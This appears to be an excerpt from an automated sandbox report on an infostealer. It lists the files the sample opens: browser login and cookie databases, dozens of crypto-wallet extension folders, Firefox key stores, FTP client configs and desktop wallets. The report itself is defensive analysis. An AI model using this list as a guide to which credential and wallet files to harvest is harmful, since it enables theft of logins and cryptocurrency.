Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	File opened: C:\Users\user\AppData\Roaming\Binance
